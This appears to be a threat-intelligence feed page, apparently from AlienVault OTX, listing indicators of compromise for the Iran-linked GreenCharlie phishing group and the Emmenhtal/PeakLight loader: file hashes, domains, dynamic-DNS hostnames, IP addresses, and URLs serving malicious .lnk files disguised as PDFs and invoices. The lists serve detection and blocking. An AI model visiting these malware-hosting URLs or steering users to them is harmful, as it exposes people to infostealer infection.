FileHash-MD5	f0dfb7bf01c0412891da8fa2702f4c7b
FileHash-MD5	f292e61774c267c3787fdfcace50ea7b
FileHash-MD5	f89be788e4adf665acf1a8ef8fcaa133
FileHash-MD5	fa1c6f7a5e02374b9d33de2578cb3399
FileHash-MD5	fc90907e70f18c7f6a6b9d9599b6f97c
FileHash-MD5	ff6f16b00c9f36b32cd60fecd4dfc8e9
FileHash-SHA1	22c9da04847c26188226c3a345e2126ef00aa19e
FileHash-SHA1	2df9c309e08140e9e9af624a6c40355819a91720
FileHash-SHA1	32a1651bb810bbe58df73bc2d2c2fa702ca7abd0
FileHash-SHA1	398ee9da244c53a136efee5e1d8acd1298008497
FileHash-SHA1	39cc32a3ede0d01cd89c7b5424beda618f805982
FileHash-SHA1	3f2fd2dfd27bf3cafcbf0946e308832e11a1d9c1
FileHash-SHA1	4c34d1cd875e39a8fa854eff3b520cdc68275f9d
FileHash-SHA1	6802e2d2d4e6ee38aa513dafd6840e864310513b
FileHash-SHA1	6cafd44c86fff605b4c25582955b725b96c1d911
FileHash-SHA1	6ec0c1d6311656c76787297775a8d0cb0aa6c4c7
FileHash-SHA1	70bc7b43e119060dce54568a1beb140da565a482
FileHash-SHA1	7820e56fbcde06ff766239e58c53610151962def
FileHash-SHA1	7f7d144cc80129d0db3159ea5d4294c34b79b20a
FileHash-SHA1	9c58ec8f7ce75ba1b629c9ef84ab069a32313288
FileHash-SHA1	a4044e90be800adab547a238f8639db3cf92ebdc
FileHash-SHA1	b8421c8e54fa5dabcfd38df68b3ac93b449d8d2d
FileHash-SHA1	b871e9afd7da87ee818ed7349a1579f3b31e104f
FileHash-SHA1	c0afb5797e6873bbee69f9bf0aa7a9dd3a1c6fff
FileHash-SHA1	c1fbe0fc31099b71315355da25a7036ea51a8627
FileHash-SHA1	dba1dce5bfe4e0290bd378a0126492569bdabc39
FileHash-SHA1	e287f70804460043b12410f95b4fa400e1910f42
FileHash-SHA1	eb60ffb03e1da380563e796b867fbddeb1fac77d
FileHash-SHA1	ec238353f020243758eb7511dddf8ab6ba01b35d
FileHash-SHA256	1146b1f38e420936b7c5f6b22212f3aa93515f3738c861f499ed1047865549cb
FileHash-SHA256	1485c0ed3e875cbdfc6786a5bd26d18ea9d31727deb8df290a1c00c780419a4e
FileHash-SHA256	2097320e71990865f04b9484858d279875cf5c66a5f6d12c819a34e2385da838
FileHash-SHA256	269d7faed3a01b5ff9181df32e3fdbf7f7f193cc53e4f28aa21290343e69f3cd
FileHash-SHA256	36b61f94bdfc86e736a4ee30718e0b1ee1c07279db079d48d3fe78b1578dbf03
FileHash-SHA256	3875ed58c0d42e05c83843b32ed33d6ba5e94e18ffe8fb1bf34fd7dedf3f82a7
FileHash-SHA256	596b2a90c1590eaf704295a2d95aae5d2fec136e9613e059fd37de4b02fd03bb
FileHash-SHA256	6f0a38c9eb9171cd323b0f599b74ee571620bc3f34aa07435e7c5822663de605
FileHash-SHA256	7495c1ea421063845eb8f4599a1c17c105f700ca0671ca874c5aa5aef3764c1c
FileHash-SHA256	8578bff36e3b02cc71495b647db88c67c3c5ca710b5a2bd539148550595d0330
FileHash-SHA256	9117bd328e37be121fb497596a2d0619a0eaca44752a1854523b8af46a5b0ceb
FileHash-SHA256	a052413e65e025cbefdddff6eeae91161de17ffec16d3a741dd9b7c33d392435
FileHash-SHA256	a2598161e1efff623de6128ad8aafba9da0300b6f86e8c951e616bd19f0a572b
FileHash-SHA256	c0dc609e6fc8801bb902d14910c3ffd69d6bd5a26389836446dc4c23565ddcc7
FileHash-SHA256	c3fa9432243e1a2ab1991ab4c07a19392038e6a8e817e5fea0232c4caabbb950
FileHash-SHA256	c5b4542d61af74cf7454d7f1c8d96218d709de38f94ccfa7c16b15f726dc08c0
FileHash-SHA256	da450c639c9a50377233c0f195c3f6162beb253f320ed57d5c9bb9c7f0e83999
FileHash-SHA256	e1ad173e49eee1194f2a55afa681cef7c3b8f6c26572f474dec7a42e9f0cdc9d
FileHash-SHA256	f4639c63fb01875946a4272c3515f005d558823311d0ee4c34896c2b66122596
FileHash-SHA256	f6c316e2385f2694d47e936b0ac4bc9b55e279d530dd5e805f0d963cb47c3c0d
FileHash-SHA256	fa2c5fa2814d4db288bf8733edc4f1a78cd2c72cde90f42cf5b14162ac648042
FileHash-SHA256	fe14edf4db2a9838f15aaf24a5837ffc5c901313d6fd2fe60d15401154e44406

GreenCharlie Infrastructure Linked to US Political Campaign Targeting

An analysis by Insikt Group revealed a significant surge in cyber threat activities from GreenCharlie, an Iran-linked group associated with Mint Sandstorm, Charming Kitten, and APT42. The group persistently targets US political and governmental entities through sophisticated phishing operations involving malware like GORBLE and POWERSTAR. Their infrastructure employs dynamic DNS providers and deceptive domain themes to facilitate phishing attacks. Recorded Future's Network Intelligence identified Iran-based IP addresses communicating with GreenCharlie's infrastructure, further suggesting Iranian involvement in these operations.

Type	Indicator
FileHash-SHA256	33a61ff123713da26f45b399a9828e29ad25fbda7e8994c954d714375ef92156
FileHash-SHA256	4ac088bf25d153ec2b9402377695b15a28019dc8087d98bd34e10fed3424125f
FileHash-SHA256	c3486133783379e13ed37c45dc6645cbee4c1c6e62e7988722931eef99c8eaf3
domain	activeeditor.info
domain	chatsynctransfer.info
domain	cloudarchive.info
domain	cloudregionpages.info
domain	directfileinternal.info
domain	itemselectionmode.info
domain	messagepending.info
domain	onetimestorage.info
domain	onlinecloudzone.info
domain	personalcloudparent.info
domain	personalwebview.info
domain	pkglessplans.xyz
domain	projectdrivevirtualcloud.co.uk
domain	realcloud.info
domain	researchdocument.info
domain	selfpackage.info
domain	webviewerpage.info
hostname	admin.cheap-case.site
hostname	api.cheap-case.site
hostname	api.overall-continuing.site
hostname	app.cheap-case.site
hostname	backend.cheap-case.site
hostname	callfeedback.duia.ro
hostname	cloudtools.duia.eu
hostname	coldwarehexahash.dns-dynamic.net
hostname	contentpreview.redirectme.net
hostname	continue.duia.eu
hostname	continueresource.forumz.info
hostname	demo.cheap-case.site
hostname	destinationzone.duia.eu
hostname	dev.cheap-case.site
hostname	doceditor.duckdns.org
hostname	documentcloudeditor.ddnsgeek.com
hostname	dynamicrender.line.pm
hostname	dynamictranslator.ddnsgeek.com
hostname	editioncloudfiles.dns-dynamic.net
hostname	entryconfirmation.duckdns.org
hostname	filereader.dns-dynamic.net
hostname	finaledition.redirectme.net
hostname	highlightsreview.line.pm
hostname	hugmefirstddd.ddns.net
hostname	icenotebook.ddns.net
hostname	joincloud.duckdns.org
hostname	joincloud.mypi.co
hostname	lineeditor.001www.com
hostname	lineeditor.32-b.it
hostname	lineeditor.mypi.co
hostname	linereview.duia.eu
hostname	longlivefreedom.ddns.net
hostname	mobiletoolssdk.dns-dynamic.net
hostname	nextcloud.duia.us
hostname	nextcloudzone.dns-dynamic.net
hostname	overflow.duia.eu
hostname	preparingdestination.fixip.org
hostname	readquickarticle.dns-dynamic.net
hostname	realpage.redirectme.net
hostname	reviewedition.duia.eu
hostname	searchstatistics.duckdns.org
hostname	sharestoredocs.theworkpc.com
hostname	smartview.dns-dynamic.net
hostname	softservicetel.ddns.net
hostname	sourceusedirection.mypi.co
hostname	storageprovider.duia.eu
hostname	streaml23.duia.eu
hostname	synctimezone.dns-dynamic.net
hostname	termsstatement.duckdns.org
hostname	thisismyapp.accesscam.org
hostname	thisismydomain.chickenkiller.com
hostname	timelinepage.dns-dynamic.net
hostname	timezone-update.duckdns.org
hostname	towerreseller.dns-dynamic.net
hostname	tracedestination.duia.eu
hostname	translatorupdater.dns-dynamic.net
hostname	uptime-timezone.dns-dynamic.net
hostname	uptimezonemetadta.run.place
hostname	vector.kozow.com
hostname	viewdestination.vpndns.net
hostname	worldstate.duia.us
hostname	www.chatsynctransfer.info
hostname	www.selfpackage.info

WebDAV-as-a-Service: Uncovering the infrastructure behind Emmenhtal loader distribution - Sekoia.io Blog

The Emmenhtal loader, also known as PeakLight, operates in a memory-only manner, making it difficult to detect and analyse. It is primarily used to distribute other malicious payloads, including well-known infostealers that target sensitive information.

Type	Indicator
IPv4	104.131.7.207
IPv4	141.98.234.166
IPv4	147.45.178.54
IPv4	147.45.50.142
IPv4	147.45.50.144
IPv4	147.45.50.172
IPv4	147.45.50.214
IPv4	147.45.50.23
IPv4	147.45.50.26
IPv4	147.45.50.34
IPv4	147.45.50.57
IPv4	147.45.50.86
IPv4	147.45.79.82
IPv4	151.236.17.180
IPv4	168.100.9.199
IPv4	178.209.51.222
IPv4	185.143.223.188
IPv4	185.196.8.158
IPv4	191.243.196.114
IPv4	193.124.33.71
IPv4	193.233.75.13
IPv4	194.190.152.108
IPv4	194.87.252.22
IPv4	200.150.194.109
IPv4	206.188.196.28
IPv4	212.18.104.111
IPv4	45.151.62.238
IPv4	46.29.234.129
IPv4	62.133.61.101
IPv4	62.133.61.104
IPv4	62.133.61.106
IPv4	62.133.61.148
IPv4	62.133.61.155
IPv4	62.133.61.168
IPv4	62.133.61.189
IPv4	62.133.61.207
IPv4	62.133.61.240
IPv4	62.133.61.26
IPv4	62.133.61.37
IPv4	62.133.61.43
IPv4	62.133.61.49
IPv4	62.133.61.56
IPv4	62.133.61.69
IPv4	62.133.61.73
IPv4	62.133.61.79
IPv4	62.133.61.90
IPv4	62.133.61.97
IPv4	62.133.61.98
IPv4	78.153.139.202
IPv4	79.137.203.158
IPv4	82.115.223.234
IPv4	84.247.187.231
IPv4	89.110.78.58
IPv4	89.23.103.118
IPv4	89.23.103.123
IPv4	89.23.103.15
IPv4	89.23.103.188
IPv4	89.23.103.205
IPv4	89.23.103.253
IPv4	89.23.103.56
IPv4	89.23.103.57
IPv4	89.23.103.8
IPv4	89.23.103.97
IPv4	89.23.107.113
IPv4	89.23.107.123
IPv4	89.23.107.168
IPv4	89.23.107.181
IPv4	89.23.107.240
IPv4	89.23.107.244
IPv4	89.23.107.251
IPv4	89.23.107.67
IPv4	89.23.113.140
IPv4	91.202.233.136
IPv4	91.92.240.234
IPv4	91.92.240.247
IPv4	91.92.240.29
IPv4	91.92.243.198
IPv4	91.92.243.74
IPv4	91.92.245.185
IPv4	91.92.245.222
IPv4	91.92.246.102
IPv4	91.92.248.129
IPv4	91.92.248.50
IPv4	91.92.248.77
IPv4	91.92.248.90
IPv4	91.92.250.123
IPv4	91.92.250.150
IPv4	91.92.250.44
IPv4	91.92.251.35
IPv4	91.92.253.126
IPv4	91.92.254.167
IPv4	91.92.254.225
IPv4	92.118.112.223
IPv4	92.118.112.253
IPv4	94.131.112.206
IPv4	94.156.64.74
IPv4	94.156.64.76
IPv4	94.156.65.126
IPv4	94.156.65.130
IPv4	94.156.69.111
IPv4	94.156.69.6
IPv4	94.156.8.31
IPv4	95.164.68.24
IPv4	95.216.196.85
URL	http://147.45.50.214/Downloads/demo.pdf.lnk
URL	http://147.45.50.57/Downloads/INVOICE%20340138551.pdf.lnk
URL	http://147.45.79.82/Downloads/qqeng.pdf.lnk
URL	http://151.236.17.180/Wire%20Confirmation/WireConfirmation.pdf.lnk
URL	http://206.188.196.28/Downloads/example.lnk
URL	http://62.133.61.101/Downloads/Invoice.pdf.lnk
URL	http://62.133.61.104/Downloads/test.pdf.lnk
URL	http://62.133.61.37/Downloads/config.txt.lnk
URL	http://62.133.61.73/Downloads/Photo.lnk
URL	http://89.23.103.56/Downloads/Videof/Full%20Video%20HD%20%281080p%29.lnk
URL	http://89.23.107.244/Downloads/Test.lnk
URL	http://89.23.107.67/Downloads/2023-Documents%20Shared.lnk
URL	http://91.92.243.198:81/Downloads/test.lnk
URL	http://91.92.251.35/Downloads/solaris-docs.lnk
URL	http://92.118.112.253/Downloads/releaseform.pdf.lnk
URL	http://94.156.64.74/Downloads/SecretTeachings.pdf.lnk

Cyber Threat Watch by AlienVault OTX

Quick Link

Important